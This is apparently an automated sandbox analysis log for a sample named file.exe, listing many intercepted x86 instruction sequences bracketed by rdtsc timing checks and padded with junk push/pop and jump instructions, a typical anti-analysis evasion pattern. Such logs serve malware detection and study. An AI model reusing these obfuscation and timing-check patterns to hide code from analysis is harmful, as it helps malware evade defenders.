Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4083C second address: C40843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C40AE0 second address: C40AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C40AE6 second address: C40AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C40DA8 second address: C40DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C40DAC second address: C40DD4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F476474B516h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F476474B528h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C40DD4 second address: C40DEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBE6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C40F7E second address: C40F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44B0D second address: C44B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44B13 second address: C44B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44B17 second address: C44B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C479BF second address: C479C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F476474B516h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C479C9 second address: C479D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C479D5 second address: C479D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C9C2 second address: C4C9C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4CAF3 second address: C4CB0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F476474B516h 0x0000000d jmp 00007F476474B51Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4CB0D second address: C4CB21 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jg 00007F4764D9CBD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F4764D9CBD6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4CCB6 second address: C4CCC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F476474B516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4CCC5 second address: C4CCCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4CCCB second address: C4CCD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4CE29 second address: C4CE37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4CE37 second address: C4CE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F476474B524h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4D0FD second address: C4D103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4D103 second address: C4D10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4D10E second address: C4D116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4D116 second address: C4D121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F476474B516h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4D121 second address: C4D126 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C10E second address: C4C116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C116 second address: C4C16B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBDAh 0x00000007 jmp 00007F4764D9CBE3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jg 00007F4764D9CBD6h 0x00000015 jmp 00007F4764D9CBDCh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F4764D9CBDEh 0x00000024 jmp 00007F4764D9CBDEh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4C16B second address: C4C170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4F4DE second address: C4F507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F4764D9CBDDh 0x0000000b jmp 00007F4764D9CBE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4F507 second address: C4F50C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC37D1 second address: BC37D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC37D5 second address: BC37DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC37DE second address: BC37E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C55239 second address: C5523D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5523D second address: C5524F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4764D9CBD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F4764D9CBD6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5524F second address: C55253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C540A7 second address: C540D0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4764D9CBD8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4764D9CBE9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C540D0 second address: C54105 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B528h 0x00000007 jmp 00007F476474B51Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F476474B516h 0x00000016 jne 00007F476474B516h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C54105 second address: C5410B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5455E second address: C5458A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F476474B51Fh 0x00000009 jmp 00007F476474B529h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5458A second address: C545A5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4764D9CBDDh 0x0000000d jp 00007F4764D9CBD6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C54736 second address: C54740 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C54740 second address: C54753 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBDDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C54753 second address: C54759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C54759 second address: C5475D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C54BD8 second address: C54BE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F476474B516h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C54FC6 second address: C54FCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C54FCA second address: C54FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5CD40 second address: C5CD44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5CD44 second address: C5CD7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F476474B526h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F476474B529h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5CD7B second address: C5CD7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5CD7F second address: C5CD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5CD85 second address: C5CD8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C5F9 second address: C5C5FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C5FF second address: C5C604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C604 second address: C5C609 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C740 second address: C5C759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBDBh 0x00000007 jne 00007F4764D9CBD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C759 second address: C5C76D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F476474B522h 0x0000000c jns 00007F476474B516h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C76D second address: C5C779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007F4764D9CBD6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5C779 second address: C5C78C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F476474B516h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push ecx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5CA6E second address: C5CA80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnl 00007F4764D9CBD6h 0x0000000c popad 0x0000000d pop edx 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C63953 second address: C6395C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C624CE second address: C624F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4764D9CBE8h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6278D second address: C6279A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jo 00007F476474B516h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6279A second address: C627A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C627A3 second address: C627A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C627A9 second address: C627AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C164BE second address: C164C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C164C2 second address: C164C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C164C8 second address: C164CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C164CE second address: C164D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C164D2 second address: C164D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C62A72 second address: C62A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4764D9CBD6h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jg 00007F4764D9CBD6h 0x00000012 jmp 00007F4764D9CBE2h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C62A98 second address: C62AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 ja 00007F476474B516h 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f popad 0x00000010 jg 00007F476474B526h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C62AB4 second address: C62AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C62C38 second address: C62C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F476474B527h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnc 00007F476474B516h 0x00000015 jmp 00007F476474B526h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C62C76 second address: C62C7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6362B second address: C63644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F476474B525h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C63644 second address: C63648 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C63648 second address: C6364E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6364E second address: C63655 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C68A37 second address: C68A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F476474B521h 0x0000000a jmp 00007F476474B51Eh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C68A60 second address: C68A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C68156 second address: C681A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F476474B516h 0x0000000a jne 00007F476474B516h 0x00000010 popad 0x00000011 jno 00007F476474B524h 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b jmp 00007F476474B51Ch 0x00000020 pop esi 0x00000021 jnc 00007F476474B528h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C681A4 second address: C681A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6B55B second address: C6B57C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F476474B516h 0x0000000a jmp 00007F476474B526h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6B57C second address: C6B5A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F4764D9CBD6h 0x00000009 jmp 00007F4764D9CBE3h 0x0000000e jne 00007F4764D9CBD6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6B5A3 second address: C6B5B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F476474B524h 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6B5B4 second address: C6B5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C718BF second address: C718C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F476474B516h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C718C9 second address: C718CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C718CD second address: C718D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C718D9 second address: C718DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C71A49 second address: C71A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C71A52 second address: C71A5C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4764D9CBDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7200F second address: C72019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C72019 second address: C7201F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C725DD second address: C725E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C72C01 second address: C72C07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C72C07 second address: C72C1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F476474B51Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C72C1C second address: C72C3E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4764D9CBD6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4764D9CBE0h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C72C3E second address: C72C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C72C42 second address: C72C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C72C48 second address: C72C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
